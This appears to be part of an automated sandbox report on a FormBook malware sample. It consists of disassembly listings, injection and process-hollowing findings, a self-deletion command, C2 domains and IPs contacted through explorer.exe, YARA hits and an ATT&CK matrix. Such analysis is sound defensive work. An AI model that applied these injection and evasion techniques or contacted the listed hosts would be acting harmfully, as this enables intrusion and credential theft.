          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A22D8A mov eax, dword ptr fs:[00000030h]1_2_00A22D8A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A22D8A mov eax, dword ptr fs:[00000030h]1_2_00A22D8A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5FD9B mov eax, dword ptr fs:[00000030h]1_2_00A5FD9B
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5FD9B mov eax, dword ptr fs:[00000030h]1_2_00A5FD9B
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A3D5E0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A3D5E0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]1_2_00AEFDE2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]1_2_00AEFDE2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]1_2_00AEFDE2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]1_2_00AEFDE2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AD8DF1 mov eax, dword ptr fs:[00000030h]1_2_00AD8DF1
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AA6DC9
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AA6DC9
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AA6DC9
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6DC9 mov ecx, dword ptr fs:[00000030h]1_2_00AA6DC9
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AA6DC9
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AA6DC9
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2AD30 mov eax, dword ptr fs:[00000030h]1_2_00A2AD30
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]1_2_00A33D34
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]1_2_00A33D34
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]1_2_00A33D34
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]1_2_00A33D34
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]1_2_00A33D34
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]1_2_00A33D34
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]1_2_00A33D34
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]1_2_00A33D34
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]1_2_00A33D34
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]1_2_00A33D34
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]1_2_00A33D34
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]1_2_00A33D34
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]1_2_00A33D34
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEE539 mov eax, dword ptr fs:[00000030h]1_2_00AEE539
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF8D34 mov eax, dword ptr fs:[00000030h]1_2_00AF8D34
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AAA537 mov eax, dword ptr fs:[00000030h]1_2_00AAA537
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A54D3B mov eax, dword ptr fs:[00000030h]1_2_00A54D3B
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A54D3B mov eax, dword ptr fs:[00000030h]1_2_00A54D3B
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A54D3B mov eax, dword ptr fs:[00000030h]1_2_00A54D3B
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4C577 mov eax, dword ptr fs:[00000030h]1_2_00A4C577
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4C577 mov eax, dword ptr fs:[00000030h]1_2_00A4C577
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A63D43 mov eax, dword ptr fs:[00000030h]1_2_00A63D43
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA3540 mov eax, dword ptr fs:[00000030h]1_2_00AA3540
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AD3D40 mov eax, dword ptr fs:[00000030h]1_2_00AD3D40
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A47D50 mov eax, dword ptr fs:[00000030h]1_2_00A47D50
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AF0EA5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AF0EA5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AF0EA5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA46A7 mov eax, dword ptr fs:[00000030h]1_2_00AA46A7
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABFE87 mov eax, dword ptr fs:[00000030h]1_2_00ABFE87
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A376E2 mov eax, dword ptr fs:[00000030h]1_2_00A376E2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A516E0 mov ecx, dword ptr fs:[00000030h]1_2_00A516E0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A68EC7 mov eax, dword ptr fs:[00000030h]1_2_00A68EC7
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A536CC mov eax, dword ptr fs:[00000030h]1_2_00A536CC
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ADFEC0 mov eax, dword ptr fs:[00000030h]1_2_00ADFEC0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF8ED6 mov eax, dword ptr fs:[00000030h]1_2_00AF8ED6
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2E620 mov eax, dword ptr fs:[00000030h]1_2_00A2E620
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ADFE3F mov eax, dword ptr fs:[00000030h]1_2_00ADFE3F
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2C600 mov eax, dword ptr fs:[00000030h]1_2_00A2C600
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2C600 mov eax, dword ptr fs:[00000030h]1_2_00A2C600
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2C600 mov eax, dword ptr fs:[00000030h]1_2_00A2C600
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A58E00 mov eax, dword ptr fs:[00000030h]1_2_00A58E00
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1608 mov eax, dword ptr fs:[00000030h]1_2_00AE1608
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5A61C mov eax, dword ptr fs:[00000030h]1_2_00A5A61C
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5A61C mov eax, dword ptr fs:[00000030h]1_2_00A5A61C
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3766D mov eax, dword ptr fs:[00000030h]1_2_00A3766D
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4AE73 mov eax, dword ptr fs:[00000030h]1_2_00A4AE73
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4AE73 mov eax, dword ptr fs:[00000030h]1_2_00A4AE73
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4AE73 mov eax, dword ptr fs:[00000030h]1_2_00A4AE73
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4AE73 mov eax, dword ptr fs:[00000030h]1_2_00A4AE73
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4AE73 mov eax, dword ptr fs:[00000030h]1_2_00A4AE73
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A37E41 mov eax, dword ptr fs:[00000030h]1_2_00A37E41
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A37E41 mov eax, dword ptr fs:[00000030h]1_2_00A37E41
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A37E41 mov eax, dword ptr fs:[00000030h]1_2_00A37E41
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A37E41 mov eax, dword ptr fs:[00000030h]1_2_00A37E41
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A37E41 mov eax, dword ptr fs:[00000030h]1_2_00A37E41
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A37E41 mov eax, dword ptr fs:[00000030h]1_2_00A37E41
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEAE44 mov eax, dword ptr fs:[00000030h]1_2_00AEAE44
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEAE44 mov eax, dword ptr fs:[00000030h]1_2_00AEAE44
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A38794 mov eax, dword ptr fs:[00000030h]1_2_00A38794
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA7794 mov eax, dword ptr fs:[00000030h]1_2_00AA7794
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA7794 mov eax, dword ptr fs:[00000030h]1_2_00AA7794
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA7794 mov eax, dword ptr fs:[00000030h]1_2_00AA7794
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A637F5 mov eax, dword ptr fs:[00000030h]1_2_00A637F5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A24F2E mov eax, dword ptr fs:[00000030h]1_2_00A24F2E
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A24F2E mov eax, dword ptr fs:[00000030h]1_2_00A24F2E
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5E730 mov eax, dword ptr fs:[00000030h]1_2_00A5E730
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4B73D mov eax, dword ptr fs:[00000030h]1_2_00A4B73D
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4B73D mov eax, dword ptr fs:[00000030h]1_2_00A4B73D
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF070D mov eax, dword ptr fs:[00000030h]1_2_00AF070D
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF070D mov eax, dword ptr fs:[00000030h]1_2_00AF070D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C746D mov eax, dword ptr fs:[00000030h]7_2_046C746D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473C450 mov eax, dword ptr fs:[00000030h]7_2_0473C450
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473C450 mov eax, dword ptr fs:[00000030h]7_2_0473C450
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046DA44B mov eax, dword ptr fs:[00000030h]7_2_046DA44B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046DBC2C mov eax, dword ptr fs:[00000030h]7_2_046DBC2C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]7_2_04761C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]7_2_04761C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]7_2_04761C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]7_2_04761C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]7_2_04761C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]7_2_04761C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]7_2_04761C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]7_2_04761C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]7_2_04761C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]7_2_04761C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]7_2_04761C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]7_2_04761C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]7_2_04761C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]7_2_04761C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726C0A mov eax, dword ptr fs:[00000030h]7_2_04726C0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726C0A mov eax, dword ptr fs:[00000030h]7_2_04726C0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726C0A mov eax, dword ptr fs:[00000030h]7_2_04726C0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726C0A mov eax, dword ptr fs:[00000030h]7_2_04726C0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0477740D mov eax, dword ptr fs:[00000030h]7_2_0477740D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0477740D mov eax, dword ptr fs:[00000030h]7_2_0477740D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0477740D mov eax, dword ptr fs:[00000030h]7_2_0477740D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726CF0 mov eax, dword ptr fs:[00000030h]7_2_04726CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726CF0 mov eax, dword ptr fs:[00000030h]7_2_04726CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726CF0 mov eax, dword ptr fs:[00000030h]7_2_04726CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047614FB mov eax, dword ptr fs:[00000030h]7_2_047614FB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04778CD6 mov eax, dword ptr fs:[00000030h]7_2_04778CD6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B849B mov eax, dword ptr fs:[00000030h]7_2_046B849B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CC577 mov eax, dword ptr fs:[00000030h]7_2_046CC577
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CC577 mov eax, dword ptr fs:[00000030h]7_2_046CC577
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E3D43 mov eax, dword ptr fs:[00000030h]7_2_046E3D43
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04723540 mov eax, dword ptr fs:[00000030h]7_2_04723540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04753D40 mov eax, dword ptr fs:[00000030h]7_2_04753D40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C7D50 mov eax, dword ptr fs:[00000030h]7_2_046C7D50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04778D34 mov eax, dword ptr fs:[00000030h]7_2_04778D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0472A537 mov eax, dword ptr fs:[00000030h]7_2_0472A537
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0476E539 mov eax, dword ptr fs:[00000030h]7_2_0476E539
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D4D3B mov eax, dword ptr fs:[00000030h]7_2_046D4D3B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D4D3B mov eax, dword ptr fs:[00000030h]7_2_046D4D3B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D4D3B mov eax, dword ptr fs:[00000030h]7_2_046D4D3B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046AAD30 mov eax, dword ptr fs:[00000030h]7_2_046AAD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B3D34 mov eax, dword ptr fs:[00000030h]7_2_046B3D34
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_0040ACE0 LdrLoadDll

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Domain query: www.alibabasdeli.com
          Source: C:\Windows\explorer.exe Domain query: www.nanasyhogar.com
          Source: C:\Windows\explorer.exe Network Connect: 172.67.173.57 80
          Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe Network Connect: 50.31.177.38 80
          Source: C:\Windows\explorer.exe Domain query: www.gigasupplies.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 890000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Memory written: C:\Users\user\Desktop\nji3Lg1ot6.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Thread register set: target process: 3352
          Source: C:\Windows\SysWOW64\msiexec.exe Thread register set: target process: 3352
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Process created: C:\Users\user\Desktop\nji3Lg1ot6.exe "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: explorer.exe, 00000003.00000000.309952888.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.373713968.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.323037533.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.297671439.00000000011E0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.562428393.0000000002F30000.00000002.00020000.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.322349912.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.373413712.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.297387525.0000000000B68000.00000004.00000020.sdmp Binary or memory string: Progman\Pr
          Source: explorer.exe, 00000003.00000000.311624897.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.309952888.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.373713968.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.323037533.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.297671439.00000000011E0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.562428393.0000000002F30000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.309952888.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.373713968.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.323037533.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.297671439.00000000011E0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.562428393.0000000002F30000.00000002.00020000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.309952888.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.373713968.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.323037533.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.297671439.00000000011E0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.562428393.0000000002F30000.00000002.00020000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.330530785.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.314804164.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.303384073.0000000008778000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match File source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
          Execution: Native API 1; Shared Modules 1; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
          Persistence: DLL Side-Loading 1; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Privilege Escalation: Process Injection 612; DLL Side-Loading 1; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Defense Evasion: Rootkit 1; Virtualization/Sandbox Evasion 2; Process Injection 612; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 2; Software Packing 1; DLL Side-Loading 1; File Deletion 1
          Credential Access: Credential API Hooking 1; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
          Discovery: Security Software Discovery 121; Virtualization/Sandbox Evasion 2; Process Discovery 2; Remote System Discovery 1; File and Directory Discovery 2; System Information Discovery 13; Network Sniffing; Network Service Scanning
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
          Collection: Credential API Hooking 1; Archive Collected Data 1; Clipboard Data 1; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
          Command and Control: Encrypted Channel 1; Ingress Tool Transfer 3; Non-Application Layer Protocol 3; Application Layer Protocol 13; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: System Shutdown/Reboot 1; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

          Behavior Graph

